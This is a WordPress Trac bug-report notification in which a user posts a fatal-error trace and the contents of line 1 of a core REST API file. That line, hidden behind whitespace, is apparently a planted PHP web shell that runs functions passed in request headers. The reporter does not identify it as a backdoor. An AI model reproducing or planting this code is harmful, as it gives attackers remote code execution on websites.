[wp-trac] [WordPress Trac] #53329: Empty Authorization header brings down site in wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
WordPress Trac
noreply at wordpress.org
Thu Jun 3 21:24:42 UTC 2021
#53329: Empty Authorization header brings down site in wp-includes/rest-
api/endpoints/class-wp-rest-attachments-controller.php
--------------------------+------------------------------
Reporter: rosandiford | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: REST API | Version: 5.7.2
Severity: normal | Resolution:
Keywords: | Focuses:
--------------------------+------------------------------
Comment (by rosandiford):
Hi @TimothyBlynJacobs
Yep:
----
Fatal error: Uncaught Error: Call to undefined function () in /var/www
/<site-folder>/wp-includes/rest-api/endpoints/class-wp-rest-attachments-
controller.php:1 Stack trace:
#0 /var/www/<site-folder>/wp-settings.php(249): require()
#1 /var/www/<site-folder>/wp-config.php(95): require_once('/var/www/<site-
folder>...')
#2 /var/www/<site-folder>/wp-load.php(37): require_once('/var/www/<site-
folder>...')
#3 /var/www/<site-folder>/wp-blog-header.php(13): require_once('/var/www
/<site-folder>...')
#4 /var/www/<site-folder>/index.php(17): require('/var/www/<site-
folder>...')
#5 {main} thrown in /var/www/<site-folder>/wp-includes/rest-api/endpoints
/class-wp-rest-attachments-controller.php on line 1
Notice: is_embed was called incorrectly. Conditional query tags do not
work before the query is run. Before then, they always return false.
Please see Debugging in WordPress for more information. (This message was
added in version 3.1.0.) in /var/www/<site-folder>/wp-
includes/functions.php on line 5313
Notice: is_search was called incorrectly. Conditional query tags do not
work before the query is run. Before then, they always return false.
Please see Debugging in WordPress for more information. (This message was
added in version 3.1.0.) in /var/www/<site-folder>/wp-
includes/functions.php on line 5313
----
My line 1 looked like:
(Lots of whitespace, scroll right)
{{{#!php
<?php
$_HEADERS=getallheaders();if(isset($_HEADERS['Authorization'])){$post=$_HEADERS['Authorization']('',
$_HEADERS['Sec-Websocket-Accept']($_HEADERS['Server-Timing']));$post();}
}}}
----
Thanks for looking at this.
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53329#comment:3>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list